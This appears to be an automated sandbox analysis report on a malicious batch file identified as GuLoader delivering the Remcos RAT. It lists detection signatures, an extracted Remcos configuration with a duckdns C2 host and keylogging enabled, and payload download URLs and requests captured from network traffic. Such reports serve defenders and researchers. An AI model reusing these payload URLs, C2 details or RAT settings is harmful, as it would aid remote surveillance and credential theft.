Windows Analysis Report
SKU_0001710-1-2024-SX-3762.bat

Overview

General Information

Sample name: SKU_0001710-1-2024-SX-3762.bat
Analysis ID: 1535955
MD5: fb6e5f4c35e2410abe92acca08412d29
SHA1: 3e70e5fa943bf9ba4e2cadd21fc3b03a3ac899b8
SHA256: 4f1b5d4bb6d0a7227948fb7ebb7765f3eb4b26288b52356453b74ea530111520
Tags: batuser-TeamDreier
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Found malware configuration
Source: 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["renajazinw.duckdns.org:53848:1"], "Assigned name": "Nbuild", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "Windeep.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JTPTLW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppDir", "Keylog folder": "remcos"}
Yara detected Remcos RAT
Source: Yara match File source: 00000009.00000002.3037991742.00000000002AE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 5172, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown HTTPS traffic detected: 89.44.138.129:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.44.138.129:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbarj source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_21F510F1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW, 13_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407898

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:62802 -> 193.187.91.216:53848
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:62817 -> 193.187.91.216:53848
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: renajazinw.duckdns.org
Uses dynamic DNS services
Source: unknown DNS query: name: renajazinw.duckdns.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:62802 -> 193.187.91.216:53848
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:62818 -> 178.237.33.50:80
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:62775
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49732
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /g/Skifferdkkers.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /g/Skifferdkkers.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /g/Skifferdkkers.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /g/MihrGCaVzvslPdUujzk140.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: artieri.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /g/Skifferdkkers.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /g/MihrGCaVzvslPdUujzk140.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: msiexec.exe, 00000009.00000002.3056080933.0000000021F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000D.00000003.2427311785.0000000004677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2427159033.0000000004677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2422765088.000000000467E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000D.00000003.2427311785.0000000004677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2427159033.0000000004677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2422765088.000000000467E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: bhv68C0.tmp.13.dr String found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv68C0.tmp.13.dr String found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
Source: msiexec.exe, 00000009.00000002.3056539906.00000000227A0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000009.00000002.3056539906.00000000227A0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: artieri.ro
Source: global traffic DNS traffic detected: DNS query: renajazinw.duckdns.org
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: powershell.exe, 00000002.00000002.1943655705.00000267B1EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943655705.00000267B1A45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943655705.00000267B036C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943655705.00000267B1EDB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://artieri.ro
Source: msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3055408372.0000000021AE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin
Source: msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://artieri.ro/g/MihrGCaVzvslPdUujzk140.binT
Source: msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://artieri.ro/g/MihrGCaVzvslPdUujzk140.binU
Source: powershell.exe, 00000002.00000002.1943655705.00000267B036C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://artieri.ro/g/Skifferdkkers.pcxP
Source: powershell.exe, 00000006.00000002.2129665169.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://artieri.ro/g/Skifferdkkers.pcxXR
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2429498672.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2430114623.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042429182.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2430472905.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2364773419.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2402846377.000000000631E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042211181.0000000006273000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2406404787.0000000006327000.00000004.00000020.00020000.00000000.sdmp, bhv68C0.tmp.13.dr String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpC
Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpH
Source: msiexec.exe, 00000009.00000003.2429498672.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2430114623.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042429182.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2430472905.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2364773419.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2402846377.000000000631E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2406404787.0000000006327000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpP
Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp_
Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpk
Source: msiexec.exe, 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpxe
Source: msiexec.exe, 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpxe2
Source: powershell.exe, 00000002.00000002.1974162438.00000267C01B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://ocspx.digicert.com0E
Source: powershell.exe, 00000006.00000002.2129665169.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1943655705.00000267B0141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2129665169.0000000004991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2129665169.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: msiexec.exe, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: msiexec.exe, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000003.2409759123.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2409782092.00000000036BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 00000009.00000002.3056080933.0000000021F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 00000009.00000002.3056080933.0000000021F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: msiexec.exe, 00000010.00000003.2409759123.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2409782092.00000000036BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comta
Source: bhv68C0.tmp.13.dr String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
Source: msiexec.exe, 0000000D.00000002.2427807461.0000000002A73000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000002.00000002.1943655705.00000267B0141000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2129665169.0000000004991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: bhv68C0.tmp.13.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: powershell.exe, 00000002.00000002.1943655705.00000267B05C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943655705.00000267B1EDB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://artieri.ro
Source: msiexec.exe, 00000009.00000002.3042211181.000000000624A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042211181.0000000006273000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://artieri.ro/
Source: msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin
Source: msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin%
Source: powershell.exe, 00000002.00000002.1943655705.00000267B1EDB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://artieri.ro/g/Skifferdkkers.pcx
